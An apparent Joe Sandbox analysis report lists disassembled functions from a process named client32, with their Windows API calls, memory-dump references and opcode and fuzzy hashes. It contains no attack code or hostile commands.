Function 111429E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,0220B858,?,?,?,00000100), ref: 111429F9

Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A

Strings

NSMTRACE, xrefs: 111429F4

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61

Function 110259A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8

Strings

psapi.dll, xrefs: 110259A1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90

Function 68594F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78

Strings

psapi.dll, xrefs: 68594F71

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
Instruction ID: b761ed76ea0f9ce8f81cf52a1ef79c57d507c6a42b64ba97d65a0e7c60646a59
Opcode Fuzzy Hash: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
Instruction Fuzzy Hash: 36E001B1901B108F87B0CF3AA50464ABEF0BB086503118A2E949EC3A10E330A5858F84

Function 11015160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E

Strings

nslsp.dll, xrefs: 11015163

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: nslsp.dll
API String ID: 1029625771-3933918195
Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2

Function 11073E70 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11073ECF
FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary_memset
String ID:
API String ID: 1654520187-0
Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1

Function 11087510 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1108752F
InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91

Function 11140AB0 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
ExtractIconExA.SHELL32(?,00000000,000204AB,000104AF,00000001), ref: 11140B08

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
Instruction ID: fbd1f7f6eca67a3d4699d4d052ae62d0c626dfd316a41b503206f924cf5b890f
Opcode Fuzzy Hash: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
Instruction Fuzzy Hash: EFF02478A4511C9FEB48CFE4CC86FBDF769E784708F808269EE12871C4CE7029488740

Function 11160535 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF

__lock_file.LIBCMT ref: 1116057C
__fclose_nolock.LIBCMT ref: 11160587

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2959217138-0
Opcode ID: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
Instruction ID: c99a5f40794e7bd6d5a1a4a2a70ed171e4b9561b0896b3e5cf790a4aaee0ba1f
Opcode Fuzzy Hash: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
Instruction Fuzzy Hash: A7F09035D11B179AD710AB7598047AEFBB86F0133CF118208C4649A1D0CBFEAA21DB96

Function 685A6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 685A6C26
Sleep.KERNEL32(00000064), ref: 685A6C5B

Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
Instruction ID: 661e61dc1211ccd4f13e12e72c8a70072f1f8168924ab5dea67af204b1cc2986
Opcode Fuzzy Hash: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
Instruction Fuzzy Hash: 77F05431640304CECF14EB7889983ACB6E1EB92315F92012ADA229A680E774CC80C746

Function 685963A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON

Download Yara Rule

APIs

WSACancelBlockingCall.WSOCK32 ref: 685963A9
Sleep.KERNEL32(00000032), ref: 685963B3

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: BlockingCallCancelSleep
String ID:
API String ID: 3706969569-0
Opcode ID: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
Instruction ID: 9c7c155be69afa6d0bd9e6666db90ee95b709ffd67e9b265f4dba9f265acbfe9
Opcode Fuzzy Hash: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
Instruction Fuzzy Hash: 80B092782A22A069AF40137109062BA20C80FD5287FE104602B59CA085EF20C504A5A1

Function 11141510 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457

Part of subcall function 1116076B: __fsopen.LIBCMT ref: 11160778

GetLastError.KERNEL32(?,0220B858,000000FF,?), ref: 11141545
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0220B858,000000FF,?), ref: 11141555

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
Opcode Fuzzy Hash: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2

Function 11010980 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 11010A34

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
Instruction ID: a25f3913c8117ba577326b804e25134151bce6e6eea091deb2a1df2ca1a14b49
Opcode Fuzzy Hash: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
Instruction Fuzzy Hash: 7F516D75A00645DFDB04CF98C980AADBBF6FF89318F24829DD5459B389C776E902CB90

Function 1113F670 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
